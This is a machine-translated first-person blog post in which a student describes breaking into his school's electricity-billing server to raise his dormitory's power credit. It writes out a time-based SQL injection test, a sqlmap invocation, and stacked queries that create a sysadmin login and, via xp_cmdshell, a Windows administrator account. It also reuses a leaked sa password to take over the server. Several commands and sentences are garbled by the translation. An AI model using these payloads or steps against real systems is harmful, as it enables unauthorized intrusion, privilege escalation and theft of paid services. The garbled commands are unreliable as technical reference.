Penetration of campus power system-one of the series of campus penetration

Penetration of campus power system-one of the series of campus penetration
Cause: Ben Qiang resigned from his internship at Xunlei. On the first day of his resignation, he went back to school and encountered a power failure when he ran out of the dormitory electricity bill. After paying off the electricity bill, I felt very sad that I had to pay for the school because I had no salary this month. So I started to have an idea about the school's electricity bill system.
0x001. Test whether there isInjectionFirst of all, our school has a electricity bill query site to check whether the company has any whole-Site program vulnerabilities that can be exploited. The site is aspx. The username and password provided by the school are all guest. after entering the room number, you can query it. Direct login box injection. When you enter gues '+' t, the system prompts that the password is incorrect, which is obviously caused by mssql splitting and injection. Manually test the guest '; IF SYSTEM_USER = 'sa 'waitfor delay' 00: 00: 05 there is still a time difference injection, and it is the sa permission. In short, there is an injection, run it directly in sqlmap.
0x002. sqlmap Elevation of Privilege
Post injection first captures packets, and then sqlmap. py-r s.txt-p TextBox1 -- dbs-username-password or something. It means that sa's hash attempts are cracked but not cracked. Direct submission; exec master. dbo. sp_addlogin vgy95 $, V_gy95; --; exec master. dbo. sp_addsrvrolemember vgy95, sysadmin; --; exec master .. xp_{shell "net user vgy95 $ V_gy95/add" --; exec master .. xp_mongoshell "net localgroup administrators vgy95 $/add" -- fortunately, this server has not set any messy Stored Procedure restrictions and is successfully executed. Now you have both the sa permission of sqlserver and a remote user with the admin permission.
The twists and turns of the 0 x electricity bill data have been greatly changed. We certainly think that this is almost the end of the process. The next update or insert process is far more difficult than this. First, let's take a look at the database, which is obviously elecctldata. After checking that there are still 419.49 degrees remaining (this electricity bill has been changed), search for "419.49" directly in the database, after the execution, I found that no table segment was found. In the Dorm_Room_Info table, I found that my dormitory id is 598, and the table segment storing electricity fees is in dbo. run the use ElecCtlDataselect * from pos where ID = 598 command on the Pos query splitter to obtain the field ElecLeft, which indicates the remaining electricity usage. The current electricity usage is 419. 49. but there will be two decimal points in the database. I immediately flipped through how the code on the query page was written, but I did not find it. Found this code: select r. name as room number, cast (p. elecLeft/100.0 as decimal () as 'remaining battery (degree) ', p. lastUpdateTime as meter reading time from pos p, dorm_room_info r where p. id = r. posid and r. name = '01 "the field ElecLeft value divided by 100 is the queried degree value, so there is a gap between two decimal points. Knowing the principle of building a statement directly: UPDATE Pos SET ElecLeft = 66666 where id = 598 shows that the execution is successful. I was excited to check whether the electricity bill is still the original value !? If the query fails, the execution is still successful, but the original value is displayed after the query.
Baidu, many people say this is because the database has written things, so it is rolled back. That is to say, when the database has data updates, the transaction will verify the consistency of each operation of the data according to the set statement. If they are inconsistent, the data will be rolled back. This seems to be the case. After logging on remotely, I found that T-SQL could not be used for debugging. So I opened SQLServerProfiler for database tracking and saw that ApplicationName was written. net sqlClient Data Provider indicates that an external device has been writing Data to the database, so my electricity bill cannot be changed. Only the Administrator who attempts to log on to the server can see what the situation is, however, the Administrator password does not exist and is in difficulty. Because the server is windows 2008 r2 and has many password requirements, it must have uppercase and lowercase letters and special characters, so I felt hopeless at the time. Turning over the web of the site. config saw that the sa user's password was mjmic *** 123, so I decided to use this password to try the Administrator user. The result was actually logged in !!!! I found that a communication program has been writing data to the database. It seems that only the program has been stopped or modified using the client on the official website. The Shortcut of the electricity management system on the desktop has been opened directly, operation recharge and modify data, everything is OK! Someone asked me why I didn't run this client for my own user. I also ran this client, but my own user didn't have the permission to modify the client and only allowed to query it. Well, this is the first step for my campus network penetration. The system manages the number of street lights in all the dormitories of our school, which can be forcibly disabled or enabled for charging fees. It is quite dangerous. During the summer vacation, vulnerabilities will be submitted. We hope that the Program Members can learn and communicate with each other.